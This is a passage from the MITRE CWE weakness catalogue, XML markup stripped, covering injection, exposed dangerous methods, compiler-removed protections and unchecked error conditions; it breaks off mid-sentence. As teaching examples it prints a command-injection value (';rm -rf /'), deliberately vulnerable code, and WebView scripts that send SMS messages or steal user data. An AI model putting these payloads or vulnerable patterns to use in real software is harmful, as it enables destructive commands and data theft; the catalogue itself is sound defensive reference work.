+ updated Mapping_Notes, Relationships + + Insecure Permission Assignment for Resource + Insecure Permission Assignment for Critical Resource + + + + The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified. + + + + + + + + + + + Access Control + Other + Bypass Protection Mechanism + Other + + + + + Black Box + This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others. + + + White Box + This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler. + + + + + CVE-2008-1685 + C compiler optimization, as allowed by specifications, removes code that is used to perform checks to detect integer overflows. + https://www.cve.org/CVERecord?id=CVE-2008-1685 + + + CVE-2019-1010006 + Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787). + https://www.cve.org/CVERecord?id=CVE-2019-1010006 + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-10-01 + 1.0.1 + 2008-10-14 + new weakness-focused entry for Research view closes the gap between 14 and 435. + + + CWE Content Team + MITRE + 2008-11-24 + updated Detection_Factors + + + CWE Content Team + MITRE + 2009-03-10 + updated Applicable_Platforms, Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. + Software or other automated logic has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. Injection problems encompass a wide variety of issues -- all mitigated in very different ways and usually attempted in order to alter the control flow of the process. For this reason, the most effective way to discuss these weaknesses is to note the distinct features that classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Confidentiality + Read Application Data + Many injection attacks involve the disclosure of important information -- in terms of both data sensitivity and usefulness in further exploitation. + + + Access Control + Bypass Protection Mechanism + In some cases, injectable code controls authentication; this may lead to a remote vulnerability. + + + Other + Alter Execution Logic + Injection attacks are characterized by the ability to significantly change the flow of a given process, and in some cases, to the execution of arbitrary code. + + + Integrity + Other + Other + Data injection attacks lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. + + + Non-Repudiation + Hide Activities + Often the actions performed by injected control code are unlogged. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Programming languages and supporting technologies might be chosen which are not subject to these issues. + + + Implementation + Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input. + + + + + This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection. + + $userName = $_POST["user"];$command = 'ls -l /home/' . $userName;system($command); + + The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as: + + ;rm -rf / + + Which would result in $command being: + + ls -l /home/;rm -rf / + + Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system. + Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks. + + + Consider the following program. It intends to perform an "ls -l" on an input filename. The validate_name() subroutine performs validation on the input to make sure that only alphanumeric and "-" characters are allowed, which avoids path traversal (CWE-22) and OS command injection (CWE-78) weaknesses. Only filenames like "abc" or "d-e-f" are intended to be allowed. + + + my $arg = GetArgument("filename"); + do_listing($arg); + + + sub do_listing { + + my($fname) = @_; + if (! validate_name($fname)) { + + print "Error: name is not well-formed!\n"; + return; + + } + # build command + my $cmd = "/bin/ls -l $fname"; + system($cmd); + + } + + sub validate_name { + + my($name) = @_; + if ($name =~ /^[\w\-]+$/) { + + return(1); + + } + else { + + return(0); + + } + + } + + + + However, validate_name() alows + filenames that begin with a "-". An adversary could + supply a filename like "-aR", producing the "ls -l -aR" + command (CWE-88), thereby getting a full recursive + listing of the entire directory and all of its + sub-directories. + + There are a couple possible mitigations for this + weakness. One would be to refactor the code to avoid + using system() altogether, instead relying on internal + functions. + + Another option could be to add a "--" argument + to the ls command, such as "ls -l --", so that any + remaining arguments are treated as filenames, causing + any leading "-" to be treated as part of a filename + instead of another option. + + Another fix might be to change the regular expression used in validate_name to force the first character of the filename to be a letter or number, such as: + + + + if ($name =~ /^\w[\w\-]+$/) ... + + + + + + + CVE-2022-36069 + Python-based dependency management tool avoids OS command injection when generating Git commands but allows injection of optional arguments with input beginning with a dash, potentially allowing for code execution. + https://www.cve.org/CVERecord?id=CVE-2022-36069 + + + CVE-1999-0067 + Canonical example of OS command injection. CGI program does not neutralize "|" metacharacter when invoking a phonebook program. + https://www.cve.org/CVERecord?id=CVE-1999-0067 + + + CVE-2022-1509 + injection of sed script syntax ("sed injection") + https://www.cve.org/CVERecord?id=CVE-2022-1509 + + + CVE-2020-9054 + Chain: improper input validation (CWE-20) in username parameter, leading to OS command injection (CWE-78), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + CVE-2021-44228 + Product does not neutralize ${xyz} style expressions, allowing remote code execution. (log4shell vulnerability) + https://www.cve.org/CVERecord?id=CVE-2021-44228 + + + + + Injection problem ('data' used as something else) + + + A6 + Injection Flaws + CWE More Specific + + + SFP24 + Tainted input to command + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-74 is high-level and often misused when lower-level weaknesses are more appropriate. + Examine the children and descendants of this entry to find a more precise mapping. + + + + + + + Many people treat injection only as an input validation problem (CWE-20) because many people do not distinguish between the consequence/attack (injection) and the protection mechanism that prevents the attack from succeeding. However, input validation is only one potential protection mechanism (output encoding is another), and there is a chaining relationship between improper input validation and the improper enforcement of the structure of messages to other components. Other issues not directly related to input validation, such as race conditions, could similarly impact message structure. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationship_Notes, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Injection + Failure to Sanitize Data into a Different Plane (aka 'Injection') + Failure to Sanitize Data into a Different Plane ('Injection') + + + + The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted. + + This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on. + The exposure can occur in a few different ways: + + The function/method was never intended to be exposed to outside actors. + The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site. + + + + + + + + Primary + + + + + + + + Architecture and Design + + + Implementation + + + Low + + + Integrity + Confidentiality + Availability + Access Control + Other + Gain Privileges or Assume Identity + Read Application Data + Modify Application Data + Execute Unauthorized Code or Commands + Other + Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities. + + + Architecture and Design + Implementation + Attack Surface Reduction + + Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be: + + accessible to all users + restricted to a small set of privileged users + prevented from being directly accessible at all + + Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting. + + + + + + In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter. + + public void removeDatabase(String databaseName) { + try { + Statement stmt = conn.createStatement();stmt.execute("DROP DATABASE " + databaseName); + + } catch (SQLException ex) {...} + } + + The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example. + + private void removeDatabase(String databaseName) { + try { + Statement stmt = conn.createStatement();stmt.execute("DROP DATABASE " + databaseName); + + } catch (SQLException ex) {...}} + + + + + + These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: + + + // Android + @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ + if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} + } + + + + // iOS + -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ + NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ + NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ + + + // Make data available back in webview. + UIWebView *webView = [self writeDataToView:[URL query]]; + }return NO; + }return YES; + } + + A call into native code can then be initiated by passing parameters within the URL: + + window.location = examplescheme://method?parameter=value + + Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. + + + This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website: + + public class WebViewGUI extends Activity { + WebView mainWebView; + public void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);mainWebView = new WebView(this);mainWebView.getSettings().setJavaScriptEnabled(true);mainWebView.addJavascriptInterface(new JavaScriptInterface(), "userInfoObject");mainWebView.loadUrl("file:///android_asset/www/index.html");setContentView(mainWebView);} + final class JavaScriptInterface { + JavaScriptInterface () {} + public String getUserInfo() {return currentUser.Info();} + } + } + + Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to. + For example, if the application has permission to send text messages: + + <script>userInfoObject.getClass().forName('android.telephony.SmsManager').getMethod('getDefault',null).sendTextMessage(attackNumber, null, attackMessage, null, null);</script> + + This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient. + + + After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example: + + final class JavaScriptInterface { + JavaScriptInterface () { } + @JavascriptInterfacepublic String getUserInfo() {return currentUser.Info();} + } + + This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface: + + <script>var info = window.userInfoObject.getUserInfo();sendUserInfo(info);</script> + + This malicious code within an iframe is able to access the interface object and steal the user's data. + + + + + CVE-2007-6382 + arbitrary Java code execution via exposed method + https://www.cve.org/CVERecord?id=CVE-2007-6382 + + + CVE-2007-1112 + security tool ActiveX control allows download or upload of files + https://www.cve.org/CVERecord?id=CVE-2007-1112 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community. + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2009-01-12 + updated Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2010-02-16 + updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Exposed Insecure Method or Function + + + + The product does not adequately filter user-controlled input for special elements with control implications. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Confidentiality + Availability + Modify Application Data + Execute Unauthorized Code or Commands + + + + + Requirements + Programming languages and supporting technologies might be chosen which are not subject to these issues. + + + Implementation + Utilize an appropriate mix of allowlist and denylist parsing to filter special element syntax from all input. + + + + + Special Element Injection + + + + + + + + Discouraged + This CWE entry might be under consideraton for deprecation, as it is not easily distinguishable from CWE-74. + N/A + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Special Element Injection + + + + The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product. + + The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer's assumptions, possibly introducing instability, incorrect behavior, or a vulnerability. + Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions. + + + + + + + + + Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function. + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Integrity + Availability + DoS: Crash, Exit, or Restart + Unexpected State + The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors. + + + + + Automated Static Analysis + Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules. + Moderate + + + Manual Dynamic Analysis + Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248). + + + + Implementation + Check the results of all functions that return a value and verify that the value is expected. + High + Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. + + + Implementation + If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248). + High + Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur. + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS. + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them. + + + Architecture and Design + Implementation + If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery. + + + Architecture and Design + Use system limits, which should help to prevent resource exhaustion. However, the product should still handle low resource conditions since they may still occur. + + + + + Consider the following code segment: + + char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf); + + The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). + + + The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc(). + + buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size); + + The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations: + + + + Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue. + + + It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state. + + + The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know. + + + + + + The following examples read a file into a byte array. + + char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {String userName = (String) i.Current();String pFileName = PFILE_ROOT + "/" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);} + + + FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) { + String userName = (String) i.next();String pFileName = PFILE_ROOT + "/" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray); + + + + + The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker. + + + The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference. + + String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {...}... + + The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference. + + String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {...}... + + The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. + + + The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined. + + System.clearProperty("os.name");...String os = System.getProperty("os.name");if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported"); + + The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. + + + The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value. + + Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20)) + + In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference + (CWE-476) would then occur in the call to strcpy(). + Note that this code is also vulnerable to a buffer overflow (CWE-119). + + + In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively. + + int outputStringToFile(char *output, char *filename) { + + openFileToWrite(filename);writeToFile(output);closeFile(filename); + } + + However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example. + + int outputStringToFile(char *output, char *filename) { + int isOutput = SUCCESS; + int isOpen = openFileToWrite(filename);if (isOpen == FAIL) {printf("Unable to open file %s", filename);isOutput = FAIL;}else { + int isWrite = writeToFile(output);if (isWrite == FAIL) {printf("Unable to write to file %s", filename);isOutput = FAIL;} + int isClose = closeFile(filename);if (isClose == FAIL)isOutput = FAIL; + + }return isOutput; + } + + + + In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method. + + private File readFile = null; + public void setInputFile(String inputFile) { + + + // create readFile File object from string containing name of file + + + } + public void readFromFile() { + try { + reader = new FileReader(readFile); + + // read input file + + + } catch (FileNotFoundException ex) {...} + } + + However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code. + + private File readFile = null; + public void setInputFile(String inputFile) { + + + // create readFile File object from string containing name of file + + + } + public void readFromFile() { + try { + if (readFile == null) {System.err.println("Input file has not been set, call setInputFile method before calling openInputFile");throw NullPointerException;} + reader = new FileReader(readFile); + + // read input file + + + } catch (FileNotFoundException ex) {...}catch (NullPointerException ex) {...} + } + + + + + + CVE-2007-3798 + Unchecked return value leads to resultant integer overflow and code execution. + https://www.cve.org/CVERecord?id=CVE-2007-3798 + + + CVE-2006-4447 + Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. + https://www.cve.org/CVERecord?id=CVE-2006-4447 + + + CVE-2006-2916 + Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. + https://www.cve.org/CVERecord?id=CVE-2006-2916 + + + + + EXP31-PL + Do not suppress or ignore exceptions + CWE More Abstract + + + Part 4-2 + Req CR 3.5 + + + Part 4-2 + Req CR 3.7 + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, 